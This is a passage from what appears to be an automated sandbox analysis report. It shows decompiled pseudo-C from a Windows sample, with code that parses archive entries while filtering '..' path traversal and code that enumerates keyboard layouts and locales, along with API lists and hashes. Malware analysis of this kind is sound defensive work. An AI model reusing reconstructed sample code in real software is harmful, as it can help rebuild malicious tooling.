                                                                                				signed char _v563;
                                                                                				signed int _v564;
                                                                                				void* _v568;
                                                                                				signed int _v572;
                                                                                				char _v576;
                                                                                				struct _FILETIME _v584;
                                                                                				char _v586;
                                                                                				char _v587;
                                                                                				char _v588;
                                                                                				struct _FILETIME _v596;
                                                                                				struct _FILETIME _v604;
                                                                                				unsigned int _v636;
                                                                                				intOrPtr _v660;
                                                                                				intOrPtr _v664;
                                                                                				unsigned int _v672;
                                                                                				unsigned int _v688;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t162;
                                                                                				intOrPtr _t164;
                                                                                				void* _t165;
                                                                                				signed int _t173;
                                                                                				void* _t175;
                                                                                				signed int _t177;
                                                                                				void* _t178;
                                                                                				signed int _t182;
                                                                                				signed int _t183;
                                                                                				signed int _t184;
                                                                                				signed int _t191;
                                                                                				unsigned int _t203;
                                                                                				long _t215;
                                                                                				void* _t217;
                                                                                				signed char _t222;
                                                                                				long _t239;
                                                                                				long _t247;
                                                                                				signed int _t250;
                                                                                				void _t255;
                                                                                				void* _t262;
                                                                                				void _t266;
                                                                                				void _t267;
                                                                                				signed int _t271;
                                                                                				unsigned int _t280;
                                                                                				signed int _t282;
                                                                                				unsigned int _t284;
                                                                                				signed int _t291;
                                                                                				signed int _t292;
                                                                                				signed char* _t303;
                                                                                				signed int _t311;
                                                                                				signed char _t317;
                                                                                				signed int _t326;
                                                                                				signed int _t327;
                                                                                				intOrPtr* _t338;
                                                                                				signed int _t340;
                                                                                				signed int _t342;
                                                                                				signed int _t347;
                                                                                
                                                                                				_t313 = __edx;
                                                                                				_t262 = __ebx;
                                                                                				_t162 =  *0x447674; // 0x4124c941
                                                                                				_v12 = _t162 ^ _t347;
                                                                                				_t164 = _a4;
                                                                                				_t337 = __ecx;
                                                                                				_v568 = __ecx;
                                                                                				if(_t164 < 0xffffffff) {
                                                                                					L64:
                                                                                					_t165 = 0x10000;
                                                                                					L65:
                                                                                					return E0041DEB4(_t165, _t262, _v12 ^ _t347, _t313, _t328, _t337);
                                                                                				}
                                                                                				_t328 =  *__ecx;
                                                                                				if(_t164 >=  *((intOrPtr*)( *__ecx + 4))) {
                                                                                					goto L64;
                                                                                				}
                                                                                				if( *((intOrPtr*)(__ecx + 4)) != 0xffffffff) {
                                                                                					E00406EF9(_t328);
                                                                                					_t164 = _a4;
                                                                                				}
                                                                                				 *(_t337 + 4) =  *(_t337 + 4) | 0xffffffff;
                                                                                				if(_t164 !=  *((intOrPtr*)(_t337 + 0x134))) {
                                                                                					__eflags = _t164 - 0xffffffff;
                                                                                					if(_t164 != 0xffffffff) {
                                                                                						_t266 =  *_t337;
                                                                                						__eflags = _t164 -  *((intOrPtr*)(_t266 + 0x10));
                                                                                						if(_t164 <  *((intOrPtr*)(_t266 + 0x10))) {
                                                                                							E00406801(_t266);
                                                                                							_t337 = _v568;
                                                                                							_t164 = _a4;
                                                                                						}
                                                                                						_t267 =  *_t337;
                                                                                						__eflags =  *((intOrPtr*)(_t267 + 0x10)) - _t164;
                                                                                						if( *((intOrPtr*)(_t267 + 0x10)) >= _t164) {
                                                                                							L14:
                                                                                							_t328 = 0x104;
                                                                                							E004065DE( *_t337,  &_v688, 0,  &_v280, 0x104);
                                                                                							_t173 = E004069B3(__eflags,  *_t337,  &_v572,  &(_v584.dwHighDateTime),  &_v576);
                                                                                							__eflags = _t173;
                                                                                							if(_t173 == 0) {
                                                                                								_t313 = _v584.dwHighDateTime;
                                                                                								_t175 =  *( *_t337);
                                                                                								_t337 = 0;
                                                                                								__eflags = E0040618F(_t175, _v584.dwHighDateTime, 0);
                                                                                								if(__eflags == 0) {
                                                                                									_t177 = E0041D474(_t262, _t313, 0x104, 0, __eflags, _v576);
                                                                                									_t337 =  *( *_v568);
                                                                                									_v572 = _t177;
                                                                                									_t178 = E004061EE( *( *_v568), _t177, 1, _v576);
                                                                                									__eflags = _t178 - _v576;
                                                                                									if(_t178 == _v576) {
                                                                                										 *_t262 =  *( *_v568 + 0x10);
                                                                                										_t182 = 0;
                                                                                										__eflags = 0;
                                                                                										do {
                                                                                											_t271 =  *((intOrPtr*)(_t347 + _t182 - 0x114));
                                                                                											 *((char*)(_t347 + _t182 - 0x21c)) = _t271;
                                                                                											_t182 = _t182 + 1;
                                                                                											__eflags = _t271;
                                                                                										} while (_t271 != 0);
                                                                                										_t338 =  &_v544;
                                                                                										while(1) {
                                                                                											_t183 =  *_t338;
                                                                                											__eflags = _t183;
                                                                                											if(_t183 == 0) {
                                                                                												break;
                                                                                											}
                                                                                											L24:
                                                                                											__eflags =  *((char*)(_t338 + 1)) - 0x3a;
                                                                                											if( *((char*)(_t338 + 1)) != 0x3a) {
                                                                                												goto L26;
                                                                                											}
                                                                                											_t338 = _t338 + 2;
                                                                                											while(1) {
                                                                                												_t183 =  *_t338;
                                                                                												__eflags = _t183;
                                                                                												if(_t183 == 0) {
                                                                                													break;
                                                                                												}
                                                                                												goto L24;
                                                                                											}
                                                                                											L26:
                                                                                											__eflags = _t183 - 0x5c;
                                                                                											if(_t183 == 0x5c) {
                                                                                												L28:
                                                                                												_t338 = _t338 + 1;
                                                                                												while(1) {
                                                                                													_t183 =  *_t338;
                                                                                													__eflags = _t183;
                                                                                													if(_t183 == 0) {
                                                                                														break;
                                                                                													}
                                                                                													goto L24;
                                                                                												}
                                                                                												goto L26;
                                                                                											}
                                                                                											__eflags = _t183 - 0x2f;
                                                                                											if(_t183 != 0x2f) {
                                                                                												_t184 = E0041EE74(_t338, "\\..\\");
                                                                                												__eflags = _t184;
                                                                                												if(_t184 != 0) {
                                                                                													L33:
                                                                                													_t50 = _t184 + 4; // 0x4
                                                                                													_t338 = _t50;
                                                                                													continue;
                                                                                												}
                                                                                												_t184 = E0041EE74(_t338, "\\../");
                                                                                												__eflags = _t184;
                                                                                												if(_t184 != 0) {
                                                                                													goto L33;
                                                                                												}
                                                                                												_t184 = E0041EE74(_t338, "/../");
                                                                                												__eflags = _t184;
                                                                                												if(_t184 != 0) {
                                                                                													goto L33;
                                                                                												}
                                                                                												_t184 = E0041EE74(_t338, "/..\\");
                                                                                												__eflags = _t184;
                                                                                												if(_t184 == 0) {
                                                                                													E0041ECF0(_t262 + 4, _t338, _t328);
                                                                                													_t280 = _v636;
                                                                                													_v563 = _t280 >> 0x0000001e & 0x00000001;
                                                                                													_t191 = _v688 >> 8;
                                                                                													_t317 =  !(_t280 >> 0x17) & 0x00000001;
                                                                                													_v562 = 0;
                                                                                													_v561 = 0;
                                                                                													_v564 = 1;
                                                                                													__eflags = _t191;
                                                                                													if(_t191 == 0) {
                                                                                														L38:
                                                                                														_v562 = _t280 >> 0x00000001 & 0x00000001;
                                                                                														_v561 = _t280 >> 0x00000002 & 0x00000001;
                                                                                														_t317 = _t280 & 0x00000001;
                                                                                														_t282 = _t280 >> 0x00000005 & 0x00000001;
                                                                                														__eflags = _t282;
                                                                                														_v563 = _t280 >> 0x00000004 & 0x00000001;
                                                                                														_v564 = _t282;
                                                                                														L39:
                                                                                														 *(_t262 + 0x108) =  *(_t262 + 0x108) & 0x00000000;
                                                                                														__eflags = _v563;
                                                                                														if(_v563 != 0) {
                                                                                															 *(_t262 + 0x108) = 0x10;
                                                                                														}
                                                                                														__eflags = _v564;
                                                                                														if(_v564 != 0) {
                                                                                															_t67 = _t262 + 0x108;
                                                                                															 *_t67 =  *(_t262 + 0x108) | 0x00000020;
                                                                                															__eflags =  *_t67;
                                                                                														}
                                                                                														__eflags = _v562;
                                                                                														if(_v562 != 0) {
                                                                                															_t70 = _t262 + 0x108;
                                                                                															 *_t70 =  *(_t262 + 0x108) | 0x00000002;
                                                                                															__eflags =  *_t70;
                                                                                														}
                                                                                														__eflags = _t317;
                                                                                														if(_t317 != 0) {
                                                                                															_t72 = _t262 + 0x108;
                                                                                															 *_t72 =  *(_t262 + 0x108) | 0x00000001;
                                                                                															__eflags =  *_t72;
                                                                                														}
                                                                                														__eflags = _v561;
                                                                                														if(_v561 != 0) {
                                                                                															_t75 = _t262 + 0x108;
                                                                                															 *_t75 =  *(_t262 + 0x108) | 0x00000004;
                                                                                															__eflags =  *_t75;
                                                                                														}
                                                                                														 *((intOrPtr*)(_t262 + 0x124)) = _v664;
                                                                                														 *((intOrPtr*)(_t262 + 0x128)) = _v660;
                                                                                														_t203 = _v672;
                                                                                														_t284 = _t203 >> 0x10;
                                                                                														_v560.wYear = (_t284 >> 9) + 0x7bc;
                                                                                														_v560.wDay = _t284 & 0x0000001f;
                                                                                														_v560.wHour = _t203 >> 0xb;
                                                                                														_v560.wSecond = (_t203 & 0x0000001f) + (_t203 & 0x0000001f);
                                                                                														_v560.wMilliseconds = 0;
                                                                                														_v560.wMonth = _t284 >> 0x00000005 & 0x0000000f;
                                                                                														_v560.wMinute = _t203 >> 0x00000005 & 0x0000003f;
                                                                                														SystemTimeToFileTime( &_v560,  &_v584);
                                                                                														_v604.dwLowDateTime = _v584.dwLowDateTime;
                                                                                														_v604.dwHighDateTime = _v584.dwHighDateTime;
                                                                                														LocalFileTimeToFileTime( &_v604,  &_v596);
                                                                                														_t215 = _v596.dwLowDateTime;
                                                                                														_t291 = _v596.dwHighDateTime;
                                                                                														_t313 = 0;
                                                                                														__eflags = _v576 - 4;
                                                                                														 *(_t262 + 0x10c) = _t215;
                                                                                														 *(_t262 + 0x110) = _t291;
                                                                                														 *(_t262 + 0x114) = _t215;
                                                                                														 *(_t262 + 0x118) = _t291;
                                                                                														 *(_t262 + 0x11c) = _t215;
                                                                                														 *(_t262 + 0x120) = _t291;
                                                                                														if(_v576 <= 4) {
                                                                                															L61:
                                                                                															__eflags = _v572;
                                                                                															if(_v572 != 0) {
                                                                                																_push(_v572);
                                                                                																E0041EE8B();
                                                                                															}
                                                                                															_t292 = 0x4b;
                                                                                															_t337 = _t262;
                                                                                															_t217 = memcpy(_v568 + 8, _t337, _t292 << 2);
                                                                                															_t328 = _t337 + _t292 + _t292;
                                                                                															 *(_v568 + 0x134) = _t217;
                                                                                															goto L7;
                                                                                														} else {
                                                                                															_v586 = 0;
                                                                                															while(1) {
                                                                                																_t340 = _v572;
                                                                                																_v588 =  *((intOrPtr*)(_t313 + _t340));
                                                                                																_v587 =  *((intOrPtr*)(_t340 + _t313 + 1));
                                                                                																_push(3);
                                                                                																__eflags = 0;
                                                                                																asm("repe cmpsb");
                                                                                																if(0 == 0) {
                                                                                																	break;
                                                                                																}
                                                                                																_t119 = ( *(_t313 + _v572 + 2) & 0x000000ff) + 4; // 0x4
                                                                                																_t250 = _t313 + _t119;
                                                                                																_v584.dwHighDateTime = _t250;
                                                                                																__eflags = _t250 + 4 - _v576;
                                                                                																if(_t250 + 4 < _v576) {
                                                                                																	_t313 = _v584.dwHighDateTime;
                                                                                																	continue;
                                                                                																}
                                                                                																goto L61;
                                                                                															}
                                                                                															_t342 = _v572;
                                                                                															_t222 =  *(_t313 + _t342 + 4) & 0x000000ff;
                                                                                															_v561 = _t222 >> 0x00000001 & 0x00000001;
                                                                                															_t313 = _t313 + 5;
                                                                                															_v562 = _t222 >> 0x00000002 & 0x00000001;
                                                                                															__eflags = _t222 & 0x00000001;
                                                                                															if((_t222 & 0x00000001) != 0) {
                                                                                																_t307 = _t313 + _t342;
                                                                                																_t327 = _t313 + 4;
                                                                                																__eflags = ((((_t313 + _t342)[3] & 0x000000ff) << 0x00000008 | (_t313 + _t342)[2] & 0x000000ff) << 0x00000008 | (_t313 + _t342)[1] & 0x000000ff) << 0x00000008 |  *_t307 & 0x000000ff;
                                                                                																_v584.dwHighDateTime = _t327;
                                                                                																_t247 = E004041BC(((((_t313 + _t342)[3] & 0x000000ff) << 0x00000008 | (_t313 + _t342)[2] & 0x000000ff) << 0x00000008 | (_t313 + _t342)[1] & 0x000000ff) << 0x00000008 |  *_t307 & 0x000000ff, _t327);
                                                                                																 *(_t262 + 0x120) = _t327;
                                                                                																_t313 = _v584.dwHighDateTime;
                                                                                																 *(_t262 + 0x11c) = _t247;
                                                                                															}
                                                                                															__eflags = _v561;
                                                                                															if(_v561 != 0) {
                                                                                																_t305 = _t313 + _t342;
                                                                                																_t326 = _t313 + 4;
                                                                                																__eflags = ((((_t313 + _t342)[3] & 0x000000ff) << 0x00000008 | (_t313 + _t342)[2] & 0x000000ff) << 0x00000008 | (_t313 + _t342)[1] & 0x000000ff) << 0x00000008 |  *_t305 & 0x000000ff;
                                                                                																_v584.dwHighDateTime = _t326;
                                                                                																_t239 = E004041BC(((((_t313 + _t342)[3] & 0x000000ff) << 0x00000008 | (_t313 + _t342)[2] & 0x000000ff) << 0x00000008 | (_t313 + _t342)[1] & 0x000000ff) << 0x00000008 |  *_t305 & 0x000000ff, _t326);
                                                                                																 *(_t262 + 0x110) = _t326;
                                                                                																_t313 = _v584.dwHighDateTime;
                                                                                																 *(_t262 + 0x10c) = _t239;
                                                                                															}
                                                                                															__eflags = _v562;
                                                                                															if(_v562 != 0) {
                                                                                																_t303 = _t313 + _v572;
                                                                                																_t313 = _t303[1] & 0x000000ff;
                                                                                																__eflags = (((_t303[3] & 0x000000ff) << 0x00000008 | _t303[2] & 0x000000ff) << 0x00000008 | _t313) << 0x00000008 |  *_t303 & 0x000000ff;
                                                                                																 *(_t262 + 0x114) = E004041BC((((_t303[3] & 0x000000ff) << 0x00000008 | _t303[2] & 0x000000ff) << 0x00000008 | _t313) << 0x00000008 |  *_t303 & 0x000000ff, _t313);
                                                                                																 *(_t262 + 0x118) = _t313;
                                                                                															}
                                                                                															goto L61;
                                                                                														}
                                                                                													}
                                                                                													__eflags = _t191 - 7;
                                                                                													if(_t191 == 7) {
                                                                                														goto L38;
                                                                                													}
                                                                                													__eflags = _t191 - 0xb;
                                                                                													if(_t191 == 0xb) {
                                                                                														goto L38;
                                                                                													}
                                                                                													__eflags = _t191 - 0xe;
                                                                                													if(_t191 != 0xe) {
                                                                                														goto L39;
                                                                                													}
                                                                                													goto L38;
                                                                                												}
                                                                                												goto L33;
                                                                                											}
                                                                                											goto L28;
                                                                                										}
                                                                                									}
                                                                                									_push(_v572);
                                                                                									E0041EE8B();
                                                                                								}
                                                                                								_t165 = 0x800;
                                                                                								goto L65;
                                                                                							}
                                                                                							_t165 = 0x700;
                                                                                							goto L65;
                                                                                						} else {
                                                                                							do {
                                                                                								E00406836( *_t337);
                                                                                								_t255 =  *_v568;
                                                                                								_t337 = _v568;
                                                                                								__eflags =  *((intOrPtr*)(_t255 + 0x10)) - _a4;
                                                                                							} while ( *((intOrPtr*)(_t255 + 0x10)) < _a4);
                                                                                							goto L14;
                                                                                						}
                                                                                					}
                                                                                					goto L9;
                                                                                				} else {
                                                                                					if(_t164 == 0xffffffff) {
                                                                                						L9:
                                                                                						 *_t262 =  *( *_t337 + 4);
                                                                                						 *((char*)(_t262 + 4)) = 0;
                                                                                						 *(_t262 + 0x108) = 0;
                                                                                						 *(_t262 + 0x10c) = 0;
                                                                                						 *(_t262 + 0x110) = 0;
                                                                                						 *(_t262 + 0x114) = 0;
                                                                                						 *(_t262 + 0x118) = 0;
                                                                                						 *(_t262 + 0x11c) = 0;
                                                                                						 *(_t262 + 0x120) = 0;
                                                                                						 *((intOrPtr*)(_t262 + 0x124)) = 0;
                                                                                						 *((intOrPtr*)(_t262 + 0x128)) = 0;
                                                                                						L7:
                                                                                						_t165 = 0;
                                                                                						goto L65;
                                                                                					}
                                                                                					_t337 = _t337 + 8;
                                                                                					_t311 = 0x4b;
                                                                                					memcpy(_t262, _t337, _t311 << 2);
                                                                                					_t328 = _t337 + _t311 + _t311;
                                                                                					goto L7;
                                                                                				}
                                                                                			}
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004071aa
                                                                                0x00000000
                                                                                0x004071a6
                                                                                0x004071bb
                                                                                0x004071bd
                                                                                0x004071c8
                                                                                0x004071cf
                                                                                0x004071d1
                                                                                0x00407206
                                                                                0x00407206
                                                                                0x00407206
                                                                                0x00000000
                                                                                0x00407206
                                                                                0x004071d9
                                                                                0x004071e0
                                                                                0x004071e2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004071ea
                                                                                0x004071f1
                                                                                0x004071f3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004071fb
                                                                                0x00407202
                                                                                0x00407204
                                                                                0x00407211
                                                                                0x00407216
                                                                                0x00407228
                                                                                0x00407236
                                                                                0x0040723c
                                                                                0x0040723f
                                                                                0x00407246
                                                                                0x0040724d
                                                                                0x00407254
                                                                                0x00407256
                                                                                0x00407267
                                                                                0x0040726d
                                                                                0x0040727a
                                                                                0x0040728c
                                                                                0x0040728f
                                                                                0x0040728f
                                                                                0x00407292
                                                                                0x00407298
                                                                                0x0040729e
                                                                                0x0040729e
                                                                                0x004072a5
                                                                                0x004072ac
                                                                                0x004072ae
                                                                                0x004072ae
                                                                                0x004072b8
                                                                                0x004072bf
                                                                                0x004072c1
                                                                                0x004072c1
                                                                                0x004072c1
                                                                                0x004072c1
                                                                                0x004072c8
                                                                                0x004072cf
                                                                                0x004072d1
                                                                                0x004072d1
                                                                                0x004072d1
                                                                                0x004072d1
                                                                                0x004072d8
                                                                                0x004072da
                                                                                0x004072dc
                                                                                0x004072dc
                                                                                0x004072dc
                                                                                0x004072dc
                                                                                0x004072e3
                                                                                0x004072ea
                                                                                0x004072ec
                                                                                0x004072ec
                                                                                0x004072ec
                                                                                0x004072ec
                                                                                0x004072f9
                                                                                0x00407305
                                                                                0x0040730b
                                                                                0x00407313
                                                                                0x00407325
                                                                                0x00407331
                                                                                0x0040733f
                                                                                0x0040734d
                                                                                0x00407356
                                                                                0x00407377
                                                                                0x0040737e
                                                                                0x00407385
                                                                                0x00407391
                                                                                0x0040739d
                                                                                0x004073b1
                                                                                0x004073b7
                                                                                0x004073bd
                                                                                0x004073c3
                                                                                0x004073c5
                                                                                0x004073cc
                                                                                0x004073d2
                                                                                0x004073d8
                                                                                0x004073de
                                                                                0x004073e4
                                                                                0x004073ea
                                                                                0x004073f0
                                                                                0x0040754f
                                                                                0x0040754f
                                                                                0x00407556
                                                                                0x00407558
                                                                                0x0040755e
                                                                                0x00407563
                                                                                0x00407572
                                                                                0x00407573
                                                                                0x00407575
                                                                                0x00407575
                                                                                0x0040757d
                                                                                0x00000000
                                                                                0x004073f6
                                                                                0x004073f6
                                                                                0x00407404
                                                                                0x00407404
                                                                                0x0040740d
                                                                                0x00407417
                                                                                0x0040741d
                                                                                0x0040742b
                                                                                0x0040742d
                                                                                0x0040742f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040743c
                                                                                0x0040743c
                                                                                0x00407440
                                                                                0x00407449
                                                                                0x0040744f
                                                                                0x004073fe
                                                                                0x00000000
                                                                                0x004073fe
                                                                                0x00000000
                                                                                0x00407451
                                                                                0x00407456
                                                                                0x0040745c
                                                                                0x00407468
                                                                                0x00407476
                                                                                0x00407479
                                                                                0x0040747f
                                                                                0x00407481
                                                                                0x00407483
                                                                                0x004074a2
                                                                                0x004074a5
                                                                                0x004074a7
                                                                                0x004074ad
                                                                                0x004074b2
                                                                                0x004074b8
                                                                                0x004074be
                                                                                0x004074be
                                                                                0x004074c4
                                                                                0x004074cb
                                                                                0x004074cd
                                                                                0x004074ec
                                                                                0x004074ef
                                                                                0x004074f1
                                                                                0x004074f7
                                                                                0x004074fc
                                                                                0x00407502
                                                                                0x00407508
                                                                                0x00407508
                                                                                0x0040750e
                                                                                0x00407515
                                                                                0x0040751d
                                                                                0x0040752d
                                                                                0x0040753c
                                                                                0x00407543
                                                                                0x00407549
                                                                                0x00407549
                                                                                0x00000000
                                                                                0x00407515
                                                                                0x004073f0
                                                                                0x00407258
                                                                                0x0040725b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040725d
                                                                                0x00407260
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407262
                                                                                0x00407265
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407265
                                                                                0x00000000
                                                                                0x00407204
                                                                                0x00000000
                                                                                0x004071bd
                                                                                0x004071a6
                                                                                0x00407170
                                                                                0x00407176
                                                                                0x0040717b
                                                                                0x00407131
                                                                                0x00000000
                                                                                0x00407131
                                                                                0x00407112
                                                                                0x00000000
                                                                                0x004070b2
                                                                                0x004070b2
                                                                                0x004070b4
                                                                                0x004070bf
                                                                                0x004070c4
                                                                                0x004070ca
                                                                                0x004070ca
                                                                                0x00000000
                                                                                0x004070b2
                                                                                0x004070b0
                                                                                0x00000000
                                                                                0x00407034
                                                                                0x00407037
                                                                                0x0040704f
                                                                                0x00407054
                                                                                0x00407058
                                                                                0x0040705c
                                                                                0x00407062
                                                                                0x00407068
                                                                                0x0040706e
                                                                                0x00407074
                                                                                0x0040707a
                                                                                0x00407080
                                                                                0x00407086
                                                                                0x0040708c
                                                                                0x00407043
                                                                                0x00407043
                                                                                0x00000000
                                                                                0x00407043
                                                                                0x0040703b
                                                                                0x0040703e
                                                                                0x00407041
                                                                                0x00407041
                                                                                0x00000000
                                                                                0x00407041

                                                                                APIs
                                                                                  • Part of subcall function 0040618F: SetFilePointer.KERNEL32(?,00000000,00000000,00000002,00406345), ref: 004061BB
                                                                                • __fassign.LIBCMT ref: 00407211
                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00407385
                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004073B1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileTime$LocalPointerSystem__fassign
                                                                                • String ID: $/../$/..\$\../$\..\
                                                                                • API String ID: 3768451866-3209527955
                                                                                • Opcode ID: fa289e630cf5602a4e304044b06216e88885c6446b794952e7e5efe033d7718a
                                                                                • Instruction ID: d8a2291f13671c0d4e8ab039e63bf794020283fff128ae678da84d371ff2c4ee
                                                                                • Opcode Fuzzy Hash: fa289e630cf5602a4e304044b06216e88885c6446b794952e7e5efe033d7718a
                                                                                • Instruction Fuzzy Hash: 58F1B271D082549BDB25CF28C8847D97BF0AF19304F1845FAE849EB382D739AA81CF59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 79%
                                                                                			E0041628C(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* __ebp;
                                                                                				signed int _t39;
                                                                                				int _t43;
                                                                                				HKL* _t45;
                                                                                				int _t46;
                                                                                				void* _t63;
                                                                                				int _t65;
                                                                                				void* _t70;
                                                                                				void* _t82;
                                                                                				intOrPtr _t84;
                                                                                				void* _t85;
                                                                                				void* _t88;
                                                                                				signed int _t89;
                                                                                				void* _t91;
                                                                                				void* _t92;
                                                                                
                                                                                				_t82 = __edx;
                                                                                				_t92 = _t91 - 0x238;
                                                                                				_t89 = _t92 - 4;
                                                                                				_t39 =  *0x447674; // 0x4124c941
                                                                                				 *(_t89 + 0x238) = _t39 ^ _t89;
                                                                                				_push(0x18);
                                                                                				E00421975(E0043653D, __ebx, __edi, __esi);
                                                                                				_t84 = __ecx;
                                                                                				 *((intOrPtr*)(_t89 - 0x20)) = 0;
                                                                                				 *((intOrPtr*)(__ecx + 0x14)) = 0xf;
                                                                                				 *((intOrPtr*)(__ecx + 0x10)) = 0;
                                                                                				 *((intOrPtr*)(_t89 - 0x24)) = __ecx;
                                                                                				 *((char*)(__ecx)) = 0;
                                                                                				 *((intOrPtr*)(_t89 - 4)) = 0;
                                                                                				 *((intOrPtr*)(_t89 - 0x20)) = 1;
                                                                                				 *((intOrPtr*)(_t89 - 0x18)) = 0;
                                                                                				_t43 = GetKeyboardLayoutList(0, 0);
                                                                                				_t87 = _t43;
                                                                                				_t45 = LocalAlloc(0x40, _t43 << 2);
                                                                                				 *(_t89 - 0x14) = _t45;
                                                                                				_t46 = GetKeyboardLayoutList(_t43, _t45);
                                                                                				 *(_t89 - 0x1c) = _t46;
                                                                                				 *(_t89 - 0x10) = 0;
                                                                                				if(_t46 > 0) {
                                                                                					do {
                                                                                						GetLocaleInfoA( *( *(_t89 - 0x14) +  *(_t89 - 0x10) * 4) & 0x0000ffff, 2, _t89 + 0x38, 0x200);
                                                                                						_t96 =  *((intOrPtr*)(_t89 - 0x18));
                                                                                						if( *((intOrPtr*)(_t89 - 0x18)) == 0) {
                                                                                							_push(_t89 + 0x38);
                                                                                							_push(_t89 + 0x1c);
                                                                                							_t87 = E0040D337(0, _t84, _t87, __eflags);
                                                                                							 *((intOrPtr*)(_t89 - 4)) = 3;
                                                                                							E0040CFB8(_t84, _t56);
                                                                                						} else {
                                                                                							_push(" / ");
                                                                                							_push(_t89 + 0x1c);
                                                                                							_t63 = E0040D337(0, _t84, _t87, _t96);
                                                                                							 *((intOrPtr*)(_t89 - 4)) = 1;
                                                                                							_t65 = E0040D3C3(_t89 + 0x38, _t89, _t63, _t89 + 0x38);
                                                                                							_t92 = _t92 + 0x14;
                                                                                							_t87 = _t65;
                                                                                							 *((char*)(_t89 - 4)) = 2;
                                                                                							E0040CFB8(_t84, _t65);
                                                                                							E00402C34(_t89, 1, 0);
                                                                                						}
                                                                                						 *((char*)(_t89 - 4)) = 0;
                                                                                						E00402C34(_t89 + 0x1c, 1, 0);
                                                                                						 *((intOrPtr*)(_t89 - 0x18)) =  *((intOrPtr*)(_t89 - 0x18)) + 1;
                                                                                						E00427E30(_t89 + 0x38, 0, 0x200);
                                                                                						_t92 = _t92 + 0xc;
                                                                                						 *(_t89 - 0x10) =  *(_t89 - 0x10) + 1;
                                                                                					} while ( *(_t89 - 0x10) <  *(_t89 - 0x1c));
                                                                                				}
                                                                                				if( *(_t89 - 0x14) != 0) {
                                                                                					LocalFree( *(_t89 - 0x14));
                                                                                				}
                                                                                				 *[fs:0x0] =  *((intOrPtr*)(_t89 - 0xc));
                                                                                				_pop(_t85);
                                                                                				_pop(_t88);
                                                                                				_pop(_t70);
                                                                                				return E0041DEB4(_t84, _t70,  *(_t89 + 0x238) ^ _t89, _t82, _t85, _t88);
                                                                                			}



















                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 004162AB
                                                                                • GetKeyboardLayoutList.USER32(00000000,00000000,00000018), ref: 004162D5
                                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 004162E3
                                                                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 004162EE
                                                                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00416318
                                                                                • _memset.LIBCMT ref: 00416399
                                                                                  • Part of subcall function 0040D337: __EH_prolog3.LIBCMT ref: 0040D33E
                                                                                  • Part of subcall function 0040CFB8: _memmove.LIBCMT ref: 0040CFD4
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                • LocalFree.KERNEL32(?), ref: 004163B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog3KeyboardLayoutListLocal_memmove$AllocFreeInfoLocale_memset
                                                                                • String ID: /
                                                                                • API String ID: 680995659-4001269591
                                                                                • Opcode ID: 24e3056ab3286c1d5e428d839ccbfcda7330cb2e561a542cbd43c07e31e761fa
                                                                                • Instruction ID: 9ceeb7082f9f43b8e82a4085ab3dcf5438f48370fb9cca8a78e0fa4408784984
                                                                                • Opcode Fuzzy Hash: 24e3056ab3286c1d5e428d839ccbfcda7330cb2e561a542cbd43c07e31e761fa
                                                                                • Instruction Fuzzy Hash: 724163B190020DAFDB00DF95D985AEEB7B8FF08344F50012EF915E7281DB789A44CBA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 75%
                                                                                			E004163E3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* _t107;
                                                                                				void* _t119;
                                                                                				void* _t121;
                                                                                				void* _t123;
                                                                                				intOrPtr* _t124;
                                                                                				void* _t129;
                                                                                				void* _t138;
                                                                                				void* _t140;
                                                                                				void* _t142;
                                                                                				intOrPtr* _t143;
                                                                                				void* _t148;
                                                                                				void* _t159;
                                                                                				void* _t161;
                                                                                				void* _t163;
                                                                                				void* _t165;
                                                                                				signed int _t180;
                                                                                				signed int _t196;
                                                                                				void* _t210;
                                                                                				void* _t224;
                                                                                				intOrPtr _t228;
                                                                                				void* _t230;
                                                                                				void* _t233;
                                                                                				void* _t234;
                                                                                				intOrPtr _t239;
                                                                                				void* _t240;
                                                                                				void* _t241;
                                                                                				void* _t245;
                                                                                
                                                                                				_t245 = __eflags;
                                                                                				_t224 = __edx;
                                                                                				_push(0x298);
                                                                                				E00421A14(E0043719C, __ebx, __edi, __esi);
                                                                                				_t239 = 0xf;
